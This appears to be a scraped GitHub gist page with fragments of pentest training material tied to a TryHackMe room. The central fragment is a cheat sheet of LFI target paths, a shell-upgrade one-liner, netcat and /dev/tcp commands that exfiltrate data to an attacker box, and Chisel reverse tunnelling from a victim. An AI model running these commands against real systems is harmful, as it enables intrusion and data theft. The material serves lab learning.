This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# Automated by Suman Roy | |
# Training by TryHackMe : https://tryhackme.com/room/breakrsa | |
# Video Tutorial Djalil Ayed : https://www.youtube.com/watch?v=pafx20wTBvI | |
import base64 | |
import struct | |
from os import chmod | |
from sys import exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Is the site running via Nginx? LFI on='/etc/nginx/sites-enabled/default' | |
# Is the site running via Nginx? LFI on='/etc/nginx/nginx.conf' | |
# Is the site running via Apache? LFI on='/var/www/' | |
# Is the site running Wordpress?=Try using WPScan and check for links that points to plugins | |
# Shell Upgrade=python3 -c 'import pty; pty.spawn("/bin/bash")' | |
# Data-Ingres via netcat=nc -lnvp [attackBoxPort] > incomingData.txt | |
# Data-Egress via Cat=cat data > /dev/tcp/[attackBoxIP]/[attackBoxPort] | |
# Data-Egress via Netcat=nc [attackBoxIP] [attackBoxPort] < dataToExfil.txt | |
# Port-Forwaring via Chisel (Attack Machine)=chisel server -p [ANY PORT] -reverse | |
# Port-Forwarding via Chisel (Victom Machine)=chisel client attackBoxIP:[attackBoxPort] R:[victimPort]:[victimNetwork]:[victimPort] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Multi Threaded Hash Generator | |
# Configure your hashtype and number of threads or use the dfault max threads available from the CPU | |
# Pre-requesite : parallel | |
# sudo apt-get install parallel -y | |
# Usage : ./hasher.bash wordlist.txt output.txt | |
# Max threads can be set to 251 for parallel | |
# Set the number of threads |